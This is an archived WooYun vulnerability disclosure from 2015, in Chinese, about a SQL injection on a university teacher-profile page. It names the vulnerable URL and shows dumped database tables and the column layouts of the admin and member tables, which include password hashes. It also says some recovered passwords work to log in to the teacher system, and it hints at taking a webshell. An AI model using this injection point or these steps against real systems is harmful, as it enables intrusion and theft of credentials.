乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-26: 细节已通知厂商并且等待厂商处理中 2015-05-31: 厂商已经主动忽略漏洞,细节向公众公开
sql注入
教师介绍页面出现sql注入
注入点
http://au.cug.edu.cn/jsxx/jsxx.php?mid=27
跑跑表
Database: autoxyweb[90 tables]+------------------------------+| dede_addonarticle || dede_addonimages || dede_addoninfos || dede_addonshop || dede_addonsoft || dede_addonspec || dede_admin || dede_admintype || dede_advancedsearch || dede_arcatt || dede_arccache || dede_archives || dede_arcmulti || dede_arcrank || dede_arctiny || dede_arctype || dede_area || dede_channeltype |
字段
Database: autoxywebTable: dede_admin[10 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| email | char(30) || id | int(10) unsigned || loginip | varchar(20) || logintime | int(10) unsigned || pwd | char(32) || tname | char(30) || typeid | text || uname | char(20) || userid | char(30) || usertype | float unsigned |+-----------+------------------+
教师信息表
Column | Type |--------------+-----------------------+ checkmail | smallint(6) | cs | mediumtext | email | char(50) | exptime | smallint(6) | face | char(50) | joinip | char(16) | jointime | int(10) unsigned | loginip | char(16) | logintime | int(10) unsigned | matt | smallint(5) unsigned | mid | mediumint(8) unsigned | money | mediumint(8) unsigned | mtype | varchar(20) | pwd | char(32) | rank | smallint(5) unsigned | safeanswer | char(30) | safequestion | smallint(5) unsigned | scores | mediumint(8) unsigned | sex | enum('男','女','保密') | spacesta | smallint(6) | uname | char(36) | uptime | int(11) |
其中一些还可以用密码去登陆教师管理系统,图片就不放了后台发现是dedecms
获取webshell之后事就不做了
你们懂的
危害等级:无影响厂商忽略
忽略时间:2015-05-31 14:38
暂无